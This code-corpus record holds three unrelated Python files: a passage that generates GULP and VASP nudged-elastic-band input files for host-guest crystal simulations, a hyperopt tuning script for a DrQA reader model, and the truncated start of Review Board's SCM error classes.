2. AtomTyper occasionally takes a long time to generate .gin files; so a performance boost is achieved by taking host-guest bonds/atomtypes from an earlier-calculated system - with the guest in a sensible position distant from the host framework.
[lsGuestAtomCartesPositions]: list, guest atom cartesian positions.
<retval>: string, created GULP .gin input file.
"""
sOut= self.sGinFileHeaderAndHostAtomData
for iThisGuestAtom,lsAtomCartesPosition in enumerate(lsGuestAtomCartesPositions):
sGuestAtomLabel,sSpeciesType= self.lsGuestAtomLabelsAndSpeciesTypes[iThisGuestAtom]
sOut+=f"{sGuestAtomLabel}\t{sSpeciesType}\t{lsAtomCartesPosition[0]:.8f}\t{lsAtomCartesPosition[1]:.8f}\t{lsAtomCartesPosition[2]:.8f}\n"
sOut+= "\n"+self.sGinFileBondsSpeciesAndLibraryContent
return sOut
def __init__(self,fnXmlAttr,xnGULPSetup,sRootOutputDir,sHostGuestName,crystalAndGuest,lsWindowDistanceStepAngstrom,ginFileTemplate,crystalGuestState):
"""Initialise the GULP NEB provider.
This provider creates a [HOST_GUEST_STEPSIZE.replicas] file (listing all atom positions through the trajectory) and two [HOST_GUEST_STEPSIZE_SideNumber.gin] files (for GULP to relax each endpoint). As host CIF-file atom labels differ from those required my GULP (for which atoms with identical bond-types need identical atom labels), all atom labels featuring in [HOST_GUEST_STEPSIZE.replicas] need mapping from their CIF label to their GULP-compatible atom label (as created by Atomtyper).
Mapping may occur either as [HOST_GUEST_STEPSIZE.replicas] is created, or as a post-creation parse process. Atomtyper *could* run only on the left/rightmost replicas, yet these are only known later in the trajectory-discovery process, and so would require writing the replicas file either later (undesirable, as wish to log content immediately, and also to avoid holding lots in memory), or at finish time parsing/updating each replicas file atom label; as each crystal can have >1000 atoms, the latter approach is expected to give poor performance, so here Atomtyper runs initially to get GULP-compatible atom labels from the window image prior to any replica work. Identical atom labels are expected for each stepsize/image.
[ginFileTemplate]: GinFileTemplate, allowing creation of GULP .gin input files from an template created earlier.
[crystalGuestState]: MoleculePosition, guest position for this image.
"""
self.fnXmlAttr= fnXmlAttr
self.xnGULPSetup= xnGULPSetup
self.lsGULPAtomTyperLabels=None # list of guest molecule atom labels (which also designate GULP bond types); listed in same order as crystal.dtAtoms.
self.ginFileTemplate= ginFileTemplate
self._CreateGULPOptimisationFile(sRootOutputDir,sRootOutputDir+sHostGuestName+".cif",len(crystalAndGuest.dtAtoms),True,crystalGuestState)
# {sFileBody=None, iNumLeftImages=0, iNumRightImages=0}
# 1. add GULP text for window position with 0 position for each interval step
# 2. insert GULP text prior for each LEFT image with incrementing integer
# 3. append GULP text post for each RIGHT image with incromenting integer
# 4. then have 3 2 1 0 4 5 6 7 with 3 left, 4 right = 8 length
# 5a. fix right, working backwards: for iThisLabel in range(iNumLeft+iNumRight,iNumLeft,-1): replace({iThisLabel},iThisLabel+1)
# 5b. fix window: replace({0},iNumLeft+1)
# 5c: fix left, working bacwards: for iThisLabel in range(1,iNumLeft+1): replace({iThisLabel},iNumLeft+1-iThisLabel)
self.lsEachIntervalReplicaMetaData=[]
self.lsWindowDistanceStepAngstrom= lsWindowDistanceStepAngstrom
self.AddWindowImages(crystalAndGuest)
@staticmethod
def CreateGinFileTemplate(fnXmlAttr,xnGULPSetup,sHostGuestName,iNumGuestAtoms):
"""Create a GULP .gin input file template object if config file specifies such.
[fnXmlAttr]: XmlAttr function.
[xnGULPSetup]: XmlNode, config file GULP setup node.
[sHostGuestName]: string, formal 'host_guest' name for this system.
[iNumGuestAtoms]: int, number of guest atoms.
<retval>: GinFileTemplate object for this MOF and guest, or None when not needed.
"""
sUseExistingAtomtyperGins= fnXmlAttr(xnGULPSetup,"useExistingAtomtyperGins",False)
bUseExistingAtomtyperGins= int(sUseExistingAtomtyperGins)==1 if sUseExistingAtomtyperGins is not None else False
if bUseExistingAtomtyperGins:
sExistingAtomTyperGinFilePath= fnXmlAttr(xnGULPSetup,"atomTyperExistingGinsDirPath",True)
sExistingAtomTyperGinFilePath+=sHostGuestName+".gin"
return GulpNEBProvider.GinFileTemplate(sExistingAtomTyperGinFilePath,iNumGuestAtoms)
else:
return None
def AddWindowImages(self,crystalAndGuest):
"""Add initial images for all step sizes with the guest at the window.
[crystalAndGuest]: Crystal.crystal.Crystal object, describing guest position in this host crystal.
"""
sGULPOutput= self._GulpNEBReplicaContentForImage(crystalAndGuest,str(0))
for fNotUsed in self.lsWindowDistanceStepAngstrom:
self.lsEachIntervalReplicaMetaData.append( {'sFileBody':sGULPOutput, 'iNumLeftImages':0, 'iNumRightImages':0} )
def AddNextImage(self,crystalAndGuest,iGuestDisplaceIntervalIndex,bLeftDisplaceSide,bEndpoint,sHostGuestStepSizeGulpDir,sCifFileNamePath,crystalGuestState):
"""Add the next image (with the guest displaced from the window) for a specific step size and window side. Images must be added from the window outwards: first from the left-side, then from the right-side. The content then contains placeholders with image numbers for this sequence (e.g. 3 2 1 0 4 5 6 7 with 3 left, 4 right) which are replaced on Save().
[crystalAndGuest]: Crystal.crystal.Crystal object, describing guest position in this host crystal.
[iGuestDisplaceIntervalIndex]: int, index of step size in [lsWindowDistanceStepAngstrom].
[bLeftDisplaceSide]: bool, image on left of window; else on right of window.
[bEndpoint]: bool, this is the endpoint - the final image on this side of the window.
[sHostGuestStepSizeGulpDir]: string, path to host-guest-stepsize/GULP/ directory.
[sCifFileNamePath]: string, CIF file name/path for this host and guest image.
[crystalGuestState]: MoleculePosition, guest position for this image.
"""
dtAllReplicaContentForThisStep= self.lsEachIntervalReplicaMetaData[iGuestDisplaceIntervalIndex]
if bLeftDisplaceSide:
dtAllReplicaContentForThisStep['iNumLeftImages']+=1
sGULPImageIndex= str(dtAllReplicaContentForThisStep['iNumLeftImages'])
else:
dtAllReplicaContentForThisStep['iNumRightImages']+=1
sGULPImageIndex= "R"+str(dtAllReplicaContentForThisStep['iNumRightImages'])
sGULPOutput= self._GulpNEBReplicaContentForImage(crystalAndGuest,sGULPImageIndex)
if bLeftDisplaceSide:
dtAllReplicaContentForThisStep['sFileBody']= sGULPOutput+dtAllReplicaContentForThisStep['sFileBody']
else:
dtAllReplicaContentForThisStep['sFileBody']+= sGULPOutput
if bEndpoint:
self._CreateGULPOptimisationFile(sHostGuestStepSizeGulpDir,sCifFileNamePath,len(crystalAndGuest.dtAtoms),False,crystalGuestState)
@staticmethod
def _FileNameNoExtension(sFileNamePath):
"""Extract the file name (without extension) from the given file name path.
[sFileNamePath]: string, file name and path.
<retval>: tuple (string, file name; int, extension index).
<except>: AppError, on missing extension or directory name.
"""
iExtensionIndex= sFileNamePath.rfind(".")
if iExtensionIndex==-1: raise AppError("Failed finding extension in file name [%s]." % sFileNamePath)
iLastSlash= sFileNamePath.rfind("/")
if iLastSlash==-1: iLastSlash= sFileNamePath.rfind("\\")
if iLastSlash==-1: raise AppError("Failed finding directory in file name [%s]." % sFileNamePath)
return sFileNamePath[iLastSlash+1:iExtensionIndex],iExtensionIndex
def _SaveRevisedGinFile(self,sHostGuestStepSideNameNoExtension,sGinFileContent,iVectorsPos,sGinFileName):
"""Save an AtomTyper-generated GULP .gin file after replacing the header (pre-'vectors') and library with config file entries.
[sHostGuestStepSideNameNoExtension]: string, HostGuestStepSide file name without extension.
[sGinFileContent]: string, AtomTyper-generated GULP .gin file content.
[iVectorsPos]: int, position of '\nvectors' marker in this content.
[sGinFileName]: string, .gin file name and path.
<except>: AppError, if errors in config file or .gin file.
"""
if len(self.xnGULPSetup)!=1 or self.xnGULPSetup[0].tag!="inputFileHeader":
raise AppError(f"Config file missing expected [GULPSetup].[inputFileHeader] element.");
sInputFileHeader= self.xnGULPSetup[0].text
sInputFileHeader= "\n".join([sHeaderLine.lstrip() for sHeaderLine in sInputFileHeader.strip().split("\n")])
if sInputFileHeader.find("[FILENAME]")==-1:
raise AppError(f"Config file [GULPSetup].[inputFileHeader] element missing required [FILENAME] marker.");
sInputFileHeader= sInputFileHeader.replace("[FILENAME]",sHostGuestStepSideNameNoExtension+"-relaxed")
# write new GULP optimisation input file
iLibraryPos= sGinFileContent.rfind("library")
if iLibraryPos==-1: raise AppError(f"'library' keyword missing from GULP optimisation input file [{sGinFileName}]");
sInputFileLibrary= self.fnXmlAttr(self.xnGULPSetup,"inputFileLibrary",True)
with open(sGinFileName,"w") as hFile:
hFile.write(sInputFileHeader+sGinFileContent[iVectorsPos:iLibraryPos]+f"library {sInputFileLibrary}\n")
def _GetAtomTyperLabelsAndDeleteGinFile(self,sGinFileContent,iVectorsPos,sGinFileName,iNumAtoms,bDeleteFile):
"""Get a list of atom labels from this AtomTyper-generated .gin file content, then delete the .gin file.
[sGinFileContent]: string, GULP .gin file content.
[iVectorsPos]: int, position of '\nvectors' marker in this content.
[sGinFileName]: string, .gin file name and path.
[iNumAtoms]: int, number of atoms expected.
[bDeleteFile]: bool, delete the .gin file before return.
<retval>: list of atom labels.
<except>: AppError, if number of expected atoms and .gin files differ.
"""
# return atom labels as generated by atomtyper.py.
sMarker="cartesian"
iStartIndex= sGinFileContent.find(sMarker,iVectorsPos)
if iStartIndex==-1: raise(f"'cartesian' keyword missing from GULP optimisation input file [{sGinFileName}]");
iStartIndex+=len(sMarker)
parser= TinyParser(sGinFileContent[iStartIndex:])
lsAtomTyperLabels=[]
while True:
parser.EatLine()
sAtomLabel= parser.EatWord()
if sAtomLabel=="": break # empty line after atom positions designates list end (although not yet file end).
elif len(lsAtomTyperLabels)>=iNumAtoms:
raise AppError(f"GULP optimisation input file [{sGinFileName}] has {len(lsAtomTyperLabels)+1} on this iteration; yet only {iNumAtoms} are expected.")
else: lsAtomTyperLabels.append(sAtomLabel)
# delete new GULP file now - was only needed for atom labels. Will leave the .stdouterr file for now.
if bDeleteFile: os.remove(sGinFileName)
return lsAtomTyperLabels
def _CreateGULPOptimisationFile(self,sHostGuestStepSizeGulpDirPath,sHostGuestEndPointCifFilePath,iNumAtoms,bGetAtomLabelsOnly,crystalGuestState):
"""Create GULP .gin file for guest trajectory endpoint (most distance image) via AtomTyper utility.
[sHostGuestStepSizeGulpDirPath]: string, host-guest-step/GULP/ directory path.
[sHostGuestEndPointCifFilePath]: string, end-point CIF file name and path.
[iNumAtoms]: int, number of atoms expected.
[bGetAtomLabelsOnly]: bool, running AtomTyper only to read atom labels, so delete .gin file on exit; else, correct file
[crystalGuestState]: MoleculePosition, guest position for this image.
"""
if self.ginFileTemplate is None:
# create GULP optimisation (.gin) file as no equivalent file provided
tpGinFile_Content_VectorPos_FilePath= self._RunAtomTyperToCreateGinFromCifFile(
sHostGuestStepSizeGulpDirPath,sHostGuestEndPointCifFilePath,bGetAtomLabelsOnly)
if bGetAtomLabelsOnly: # client only wants the host-guest atom labels; remove the .gin file
sGULPOptimisationInput,iVectorsPos,sGinFilePath= tpGinFile_Content_VectorPos_FilePath
self.lsGULPAtomTyperLabels= self._GetAtomTyperLabelsAndDeleteGinFile(sGULPOptimisationInput,iVectorsPos,sGinFilePath,iNumAtoms,True)
else: # read .gins from provided directory and insert atom coords
sGinFilePath= sHostGuestStepSizeGulpDirPath+(self._FileNameNoExtension(sHostGuestEndPointCifFilePath)[0])+".gin"
if bGetAtomLabelsOnly:
sGULPOptimisationInput= self.ginFileTemplate.Render(crystalGuestState.lsOrientedGuestAtomCartesPos)
iVectorsPos= sGULPOptimisationInput.find('\nvectors')
if iVectorsPos==-1:
raise Exception("Failed finding vectors in template content for "+sHostGuestEndPointCifFilePath)
self.lsGULPAtomTyperLabels= self._GetAtomTyperLabelsAndDeleteGinFile(sGULPOptimisationInput,iVectorsPos,sGinFilePath,iNumAtoms,False)
else:
sGULPOptimisationInput= self.ginFileTemplate.Render(crystalGuestState.lsOrientedGuestAtomCartesPos)
iIndex= sGinFilePath.rfind("/")
os.makedirs(sGinFilePath[:iIndex],exist_ok=True)
with open(sGinFilePath,"w") as fGinFile:
fGinFile.write(sGULPOptimisationInput)
def _RunAtomTyperToCreateGinFromCifFile(self,sHostGuestStepSizeGulpDir,sHostGuestEndPointCifFilePath,bDontSaveRevisedGinFile):
"""Create GULP .gin file for guest trajectory endpoint (most distance image) via AtomTyper utility.
[sHostGuestStepSizeGulpDir]: string, host-guest-step/GULP/ directory path.
[sHostGuestEndPointCifFilePath]: string, end-point CIF file name and path.
[bDontSaveRevisedGinFile]: bool, don't save a revised .gin file, presumably as running AtomTyper only to read atom labels.
<retval>: if [bDontSaveRevisedGinFile], tuple (string: created .gin file output; int: position of lattice vectors data; string: .gin file path); else, None.
"""
sPythonExecutable27= self.fnXmlAttr(self.xnGULPSetup,"pythonExecutable2-7",True)
sAtomTyperDir= self.fnXmlAttr(self.xnGULPSetup,"atomTyperUtilPath",True)
sShellTextEncoding= self.fnXmlAttr(self.xnGULPSetup,"shellTextEncoding",True) # "cp850" (Windows, or see Console\Properties\Options\Current code page), "UTF-8" (Linux), etc. See https://docs.python.org/3/library/codecs.html#standard-encodings
retVal= sb.run( [sPythonExecutable27, sAtomTyperDir+"atomtyper.py", "-f", sHostGuestEndPointCifFilePath,
"-l", sAtomTyperDir+"libraries/uff4mof.csv", "-r", sAtomTyperDir+"libraries/rappe.csv"],
stdout=sb.PIPE,stderr=sb.STDOUT,encoding=sShellTextEncoding) # See: https://docs.python.org/3/library/subprocess.html
# encoding does retVal.stdout.decode(sShellTextEncoding), e.g. "cp850", "UTF-8".
# write AtomTyper .stdouterr for debugging purposes
sHostGuestStepSizeNameNoExtension,iExtensionIndex= self._FileNameNoExtension(sHostGuestEndPointCifFilePath)
sErrFileName= f"{sHostGuestStepSizeGulpDir}{sHostGuestStepSizeNameNoExtension}.stdouterr"
if not os.access(sHostGuestStepSizeGulpDir,os.F_OK): os.mkdir(sHostGuestStepSizeGulpDir)
with open(sErrFileName,"w",newline="") as hFile: # don't translate console newline characters.
# see https://docs.python.org/release/3.2/library/functions.html#open
hFile.write(retVal.stdout)
# AtomTyper creates .gin file in same directory as CIF file, so move to new output directory (as necessary)
sCurrentGULPFilePath= f"{sHostGuestEndPointCifFilePath[:iExtensionIndex]}.gin"
sNewGULPFilePath= f"{sHostGuestStepSizeGulpDir}{sHostGuestStepSizeNameNoExtension}.gin"
if not bDontSaveRevisedGinFile and sCurrentGULPFilePath!=sNewGULPFilePath:
if os.access(sNewGULPFilePath,os.F_OK): os.remove(sNewGULPFilePath)
os.rename(sCurrentGULPFilePath,sNewGULPFilePath)
# read AtomTyper's created GULP optimisation .gin input file, which requires some replacements
with open(sNewGULPFilePath,"r") as hFile:
sGULPOptimisationInput= hFile.read()
iVectorsPos= sGULPOptimisationInput.find("\nvectors")
if iVectorsPos==-1: raise AppError(f"'vectors' keyword missing from GULP optimisation input file [{sNewGULPFilePath}]");
if bDontSaveRevisedGinFile:
return sGULPOptimisationInput,iVectorsPos,sNewGULPFilePath
else:
self._SaveRevisedGinFile(sHostGuestStepSizeNameNoExtension,sGULPOptimisationInput,iVectorsPos,sNewGULPFilePath)
return None
def _GulpNEBReplicaContentForImage(self,crystal,sGulpTemporaryImageIndexKey):
"""Generate GULP NEB replica content for this step (image).
Replica content details lattice parameters and atom positions. The final GULP NEB .gin input file combines additional header/footer content with replica content for each step.
[crystal]: crystal object representing the crystal and molecule for this step.
[sGulpTemporaryImageIndexKey]: string; GULP image index key, to be replaced later with correct index (once the number of steps is known). Correct index is an ascending integer with leftmost image having index 1, window having index (NumLeftImages+1) and rightmost image having index (NumLeftImages+NumRightImages+1); however, calculation moves outwards from window, so window has temporary key 0, left images have ascending 1-based key integers outwards from the window, while right images have ascending key strings R1, R2, R3 ... outwards from the window.
<retval>: string, replica content for this step.
"""
sBody= "rcell {%s}\n %.6f %.6f %.6f %.6f %.6f %.6f\nrfractional {%s}\n" % (
sGulpTemporaryImageIndexKey,*crystal.lsLatticeParams,*crystal.lsLatticeVectorAnglesDegrees,sGulpTemporaryImageIndexKey)
for iAtom,thisAtom in enumerate(crystal.dtAtoms.values()):
#NOTE: previously used 'rcartesian' rather than 'rfractional' with below and %.6f output:
#arAtomCartesVector= cgeom.FractionalToCartesianVector(None,thisAtom.lsFracLatticePos,crystal.lsCartesianLatticeVectors)
sBody+= "%s core %.8f %.8f %.8f\n" % (self.lsGULPAtomTyperLabels[iAtom],
thisAtom.lsFracLatticePos[0],thisAtom.lsFracLatticePos[1],thisAtom.lsFracLatticePos[2])
return sBody
def Save(self,fnHostGuestStepSizeName,sHostGuestName,sRootOutputDir,sTrajectoryMethod):
"""Save the GULP '.replica' file for each step size. The remaining GULP tasks are completed in a subsequent step, i.e. GULP-relaxing endpoints and writing the '_NEB.gin' file.
[fnHostGuestStepSizeName]: function, HostGuestStepSizeName(sHostGuestName,fWindowDistanceStepAngstrom) giving specified host-guest-stepsize name for relevant files.
[sHostGuestName]: string, crystal host-guest-step-size name.
[sRootOutputDir]: string, root output directory.
[sTrajectoryMethod]: string, trajectory method formal name.
"""
for iInterval,fWindowDistanceStepAngstrom in enumerate(self.lsWindowDistanceStepAngstrom):
sHostGuestStepSizeName= fnHostGuestStepSizeName(sHostGuestName,fWindowDistanceStepAngstrom)
sHostGuestStepSizeDir= f"{sRootOutputDir}{sHostGuestStepSizeName}/{sTrajectoryMethod}/"
#CHANGE: below line thought unnecessary, so removed in this refactor. Rid if confirm same results
#crystalAndGuest.WriteCIF(f"{sHostGuestStepSizeDir}{sHostGuestStepSizeName}_{'L' if bLeftDisplaceSide else 'R'}{iPositionIndex}.cif")
sHostGuestStepGulpDirPath= sHostGuestStepSizeDir+"GULP/"
if not os.access(sHostGuestStepGulpDirPath,os.F_OK):
os.mkdir(sHostGuestStepGulpDirPath) # GULP/ dir may not exist if same L and R steps fail (e.g. 0.25 Angstrom). Just creating dir today until have better solution.
sReplicasFileName= sHostGuestStepGulpDirPath+sHostGuestStepSizeName+".replicas"
# GULPFileBody currently has label sequence, e.g. 3 2 1 0 4 5 6 7 with 3 left, 4 right = 8 length.
# so update the labels {0} so they have ascending sequence from start to end of file
iNumLeftImages= self.lsEachIntervalReplicaMetaData[iInterval]['iNumLeftImages']
iNumRightImages= self.lsEachIntervalReplicaMetaData[iInterval]['iNumRightImages']
dtRightImageKeywords= {'R'+str(iRightImageIndex):(iNumLeftImages+iRightImageIndex+1) for iRightImageIndex in range(1,iNumRightImages+1)}
lsAscendSequence= [iNumLeftImages+1]+list(range(iNumLeftImages,0,-1))
sGULPFileBody= self.lsEachIntervalReplicaMetaData[iInterval]['sFileBody'].format(*lsAscendSequence,**dtRightImageKeywords)
with open(sReplicasFileName,"w") as hFile:
hFile.write(sGULPFileBody)
class VaspNEBProvider:
def __init__(self,crystalAndGuest,sHostName,sGuestName,lsWindowDistanceStepAngstrom):
"""Initialise data for a VASP NEB calculation.
[crystalAndGuest]: Crystal.crystal.Crystal object, describing guest position in this host crystal.
[sHostName]: string, name of host crystal.
[sGuestName]: string, name of guest molecule.
[lsWindowDistanceStepAngstrom]: list, of step sizes (Angstrom) for displacements from window position.
[bAddInitialImages]: bool, add initial images with guest at window.
"""
self.dtAtomsByChemicalSymbol= self._GetAtomsByChemicalSymbol(crystalAndGuest) # prior called dtElementTypeAtoms
self.sPOSCARHeader= self._POSCARHeader(crystalAndGuest,sHostName,sGuestName)
self.lsEachIntervalVASPOutput=[] # list covering each step-size; each element lists VASP output for all images of that step-size.
self.lsWindowDistanceStepAngstrom= lsWindowDistanceStepAngstrom
self.AddWindowImages(crystalAndGuest)
def _GetAtomsByChemicalSymbol(self,crystal):
"""Return a dictionary which lists atoms by chemical element.
[crystal]: Crystal.crystal.Crystal object.
<retval>: dict, key: chemical symbol, value: list of atoms for this element.
"""
dtAtomsByChemicalSymbol={}
for thisAtom in crystal.dtAtoms.values():
if thisAtom.sChemicalSymbol in dtAtomsByChemicalSymbol:
dtAtomsByChemicalSymbol[thisAtom.sChemicalSymbol].append(thisAtom)
else: dtAtomsByChemicalSymbol[thisAtom.sChemicalSymbol]=[thisAtom]
return dtAtomsByChemicalSymbol
def _POSCARHeader(self,crystal,sHostName,sGuestName):
"""Create header for VASP POSCAR file. Header contains placeholders for step size and image number [subsequently replaced in Save()].
[crystal]: Crystal.crystal.Crystal object, describing guest position in this host crystal.
[sHostName]: string, name of host crystal.
[sGuestName]: string, name of guest molecule.
<retval>: string, POSCAR header.
"""
sComment= "Guest %s NEB trajectory with {0:.2f} Angstrom steps in host %s, image {1}." % (sGuestName,sHostName)
sHeader= "%s\n1.0\n %12.8f %12.8f %12.8f\n %12.8f %12.8f %12.8f\n %12.8f %12.8f %12.8f\n" % (sComment,
*crystal.lsCartesianLatticeVectors[0],*crystal.lsCartesianLatticeVectors[1],*crystal.lsCartesianLatticeVectors[2])
sElementTitleRow=" "
sAtomCountRow=" "
for sChemicalSymbol,lsAtoms in self.dtAtomsByChemicalSymbol.items():
iNumAtomsOfThisElement= len(lsAtoms)
iNumCharsForElementCount= len(str(iNumAtomsOfThisElement))
iNumCharsForElementColumn= max(iNumCharsForElementCount,len(sChemicalSymbol))
sFormat=" %%%ds" % iNumCharsForElementColumn
sElementTitleRow+= sFormat % sChemicalSymbol
sFormat=" %%%dd" % iNumCharsForElementColumn
sAtomCountRow+= sFormat % iNumAtomsOfThisElement
sHeader+=sElementTitleRow+"\n"+sAtomCountRow+"\nDirect\n"
return sHeader
def _POSCARBody(self,crystal):
"""Create body for VASP POSCAR file.
[crystal]: Crystal.crystal.Crystal object, describing guest position in this host crystal.
<retval>: string, POSCAR body.
"""
sBody=""
for lsAtoms in self.dtAtomsByChemicalSymbol.values():
for thisAtom in lsAtoms:
#arAtomCartesVector= cgeom.FractionalToCartesianVector(None,thisAtom.lsFracLatticePos,crystal.lsCartesianLatticeVectors)
sBody+= " %12.8f %12.8f %12.8f\n" % (thisAtom.lsFracLatticePos[0],thisAtom.lsFracLatticePos[1],thisAtom.lsFracLatticePos[2])
return sBody
def AddWindowImages(self,crystalAndGuest):
"""Add initial images for all step sizes with the guest at the window.
"""
sPOSCARContent= self.sPOSCARHeader+self._POSCARBody(crystalAndGuest)
for fNotUsed in self.lsWindowDistanceStepAngstrom:
self.lsEachIntervalVASPOutput.append( [sPOSCARContent] )
def AddNextImage(self,crystalAndGuest,iGuestDisplaceIntervalIndex,bLeftDisplaceSide):
"""Add the next image (with the guest displaced from the window) for a specific step size and window side.
[crystalAndGuest]: Crystal.crystal.Crystal object, describing guest position in this host crystal.
[iGuestDisplaceIntervalIndex]: int, index of step size in [lsWindowDistanceStepAngstrom]; an image is added for this step size only.
[bLeftDisplaceSide]: bool, image on left of window; else on right of window.
"""
# add a single image for a specific step size and side of the window
sPOSCARContent= self.sPOSCARHeader+self._POSCARBody(crystalAndGuest)
lsImages= self.lsEachIntervalVASPOutput[iGuestDisplaceIntervalIndex]
lsImages.insert(0 if bLeftDisplaceSide else len(lsImages),sPOSCARContent)
def Save(self,fnHostGuestStepSizeName,sHostGuestName,sRootOutputDir,sTrajectoryMethod,lsReplicaMetaDataForStepSize):
"""Create input files (below OutputDir/RefCode_Guest_StepSize/VASP/) for the VASP NEB calculation: a sub-directory for each image, each contains a POSCAR file for that image; sub-directories labelled from 00 to the last image number.
[fnHostGuestStepSizeName]: function, HostGuestStepSizeName(sHostGuestName,fWindowDistanceStepAngstrom) giving specified host-guest-stepsize name for relevant files.
[sHostGuestName]: string, crystal host-guest-step-size name.
[sRootOutputDir]: string, root output directory.
[sTrajectoryMethod]: string, trajectory method formal name.
[lsReplicaMetaDataForStepSize]: list of dictionaries for each step size giving number of images.
"""
for iThisGuestInterval,lsVASPOutput in enumerate(self.lsEachIntervalVASPOutput):
for iImage,sPOSCAROutput in enumerate(lsVASPOutput,0):
fWindowDistanceStepAngstrom= self.lsWindowDistanceStepAngstrom[iThisGuestInterval]
sHostGuestStepSizeName= fnHostGuestStepSizeName(sHostGuestName,fWindowDistanceStepAngstrom)
sHostGuestStepSizeDir= f"{sRootOutputDir}{sHostGuestStepSizeName}/{sTrajectoryMethod}/VASP/{iImage:02}/"
if not os.access(sHostGuestStepSizeDir,os.F_OK): os.makedirs(sHostGuestStepSizeDir)
sWindowLabel= "[window] " if iImage==lsReplicaMetaDataForStepSize[iThisGuestInterval]['iNumLeftImages'] else ""
with open(sHostGuestStepSizeDir+"POSCAR","w") as hFile:
hFile.write(sPOSCAROutput.format(fWindowDistanceStepAngstrom,"%d %sof %d" % (iImage+1,sWindowLabel,len(lsVASPOutput)),sWindowLabel))
|
<gh_stars>0
import itertools
import os
import subprocess
import numpy as np
import time
import datetime
from hyperopt import hp
import pandas as pd
HomeDir = os.environ.get('HOME')
# os.chdir(os.path.join(HomeDir,"CS3244/DrQA"))
os.chdir(os.path.join(HomeDir,"DrQA"))
# print(os.getcwd())
top10_result = "validation/top10_result.csv"
hide_output = False
MAX_EVALS = 1
#### Fixed Parameters ##
fixed_params ={
"--num-epoch" : 1,
"--embedding-file": "glove.6B.200d.txt",
"--model-name": "",
"--model-dir": "",
"--train-file": "ln_train-processed-corenlp.txt",
"--dev-file": "ln_dev-processed-corenlp.txt",
"--dev-json": "ln_dev.json",
"--train-json": "ln_train.json",
"--pretrained": "models/pre_trained_single/64_2_no_concat_200.mdl"
}
#### Hyper parameters ###
params = {
"--batch-size" : hp.choice('--batch-size',[32]),
"--model-type" : hp.choice('--model-type',['rnn']),
"--hidden-size": hp.choice('--hidden-size',[64]),
"--doc-layers" : hp.choice('--doc-layers',[2]),
"--question-layers" :hp.choice('--question-layers',[2]),
"--rnn-type" :hp.choice('--rnn-type',['LSTM']),
"--concat-rnn-layers" : hp.choice('--concat-rnn-layers',[False]),
"--question-merge" :hp.choice('--question-merge',['self_attn']),
"--dropout-emb" :hp.uniform('--dropout-emb',0,1),
"--dropout-rnn" :hp.uniform('--dropout-rnn',0,1),
"--dropout-rnn-output" :hp.choice('--dropout-rnn-output',[True,False]),
"--grad-clipping" :hp.choice('--grad-clipping',[10]),
"--weight-decay" :hp.uniform('--weight-decay',0,1),
"--momentum" :hp.uniform('--momentum',0,1),
"--fix-embedding" :hp.choice('--fix-embedding',[True,False]),
"--tune-partial" : hp.choice('--tune-partial',[1000]),
"--rnn-padding" :hp.choice('--rnn-padding',[True, False]),
"--max-len" : hp.choice('--max-len',[15])}
def objective(param):
start = time.time()
CMD ="python scripts/reader/train.py"
model_name = "_".join(list(map(lambda x: str(x),param.values())))
model_dir = "models/val_models/" + model_name + "/"
fixed_params["--model-name"] = model_name
fixed_params["--model-dir"] = model_dir
for name,value in fixed_params.items():
CMD += " " + name + " " + str(value)
for name,value in param.items():
CMD = CMD + " " + name + " " + str(value)
if hide_output:
CMD = CMD +" &> /dev/null"
os.system("bash -c \"" + CMD+"\"")
with open(model_dir + model_name+"_best.txt",'r') as log:
log_ = log.readline().split(',')
F1 = -float(log_[1])
end = time.time()
time_elapsed = end -start
print("Comb: " + str(ith[0]))
print("F1: "+ str(log_[1]) +" EM: " + str(log_[2]))
print("Time Elapsed: " + str(datetime.timedelta(seconds = time_elapsed)))
print("Time Remaining: " + str(datetime.timedelta(seconds = time_elapsed*(MAX_EVALS -ith[0]))))
print("_"*100)
ith[0] = ith[0]+1
results = {'loss':F1,'status': STATUS_OK, 'x': param, 'time':time_elapsed}
return results
from hyperopt import Trials
from hyperopt import fmin
from hyperopt import rand, tpe
from hyperopt import STATUS_OK
ith = [1]
tpe_algo = tpe.suggest
tpe_trials = Trials()
best = fmin(fn = objective,space = params,algo=tpe_algo, trials= tpe_trials,
max_evals = MAX_EVALS,rstate = np.random.RandomState(50))
print('Minimum loss attained with TPE: {:.4f}'.format(tpe_trials.best_trial['result']['loss']))
print(len(tpe_trials.results))
results = tpe_trials.results
results_df = pd.DataFrame({'loss': [x['loss'] for x in results],
'x': [x['x'] for x in results] })
results_df = results_df.sort_values('loss', ascending = True)
results_df.to_csv('validation/data_frame_result.csv',sep =",")
result = open(top10_result,'w')
header = ",".join(['epoch_best','F1_Dev_best','EM_Dev_best','S_Dev_best','E_Dev_best','Exact_Dev_best','F1_Train','EM_train','S_Train','E_Train','Exact_Train','Loss_Train'])
result.write(header+"\n")
if len(results)>=10:
top_10 = int(len(results)/20)
else:
top_10 = 1
for i in range(top_10):
param = results[i]['x']
CMD ="python scripts/reader/train.py"
model_name = "_".join(list(map(lambda x: str(x),param.values())))
model_dir = "models/val_models/" + model_name + "/"
fixed_params["--model-name"] = model_name
fixed_params["--model-dir"] = model_dir
fixed_params["--num-epoch"] = 1
for name,value in fixed_params.items():
CMD += " " + name + " " + str(value)
for name,value in param.items():
CMD = CMD + " " + name + " " + str(value)
if hide_output:
CMD = CMD +" &> /dev/null"
os.system("bash -c \"" + CMD+"\"")
log_result =[]
with open(model_dir + model_name+"_best.txt",'r') as log:
log_ = log.readline().split(' ')
log_result.extend(log_)
result.write(",".join(log_result)+"\n")
result.close()
|
<gh_stars>0
import socket
from django.utils.translation import ugettext as _
from djblets.util.humanize import humanize_list
class SCMError(Exception):
def __init__(self, msg):
Exception.__init__(self, msg)
class ChangeSetError(SCMError):
pass
class InvalidChangeNumberError(ChangeSetError):
def __init__(self):
ChangeSetError.__init__(self, None)
class ChangeNumberInUseError(ChangeSetError):
def __init__(self, review_request=None):
ChangeSetError.__init__(self, None)
self.review_request = review_request
class EmptyChangeSetError(ChangeSetError):
def __init__(self, changenum):
ChangeSetError.__init__(self, _('Changeset %s is empty') % changenum)
class InvalidRevisionFormatError(SCMError):
"""Indicates that a revision isn't in a recognizable format."""
def __init__(self, path, revision, detail=None):
msg = "The revision '%s' for '%s' isn't in a valid format" % \
(revision, path)
if detail:
msg += ': ' + detail
SCMError.__init__(self, msg)
self.path = path
self.revision = revision
self.detail = detail
class FileNotFoundError(SCMError):
def __init__(self, path, revision=None, detail=None):
from reviewboard.scmtools.core import HEAD
if revision == None or revision == HEAD:
msg = "The file '%s' could not be found in the repository" % path
else:
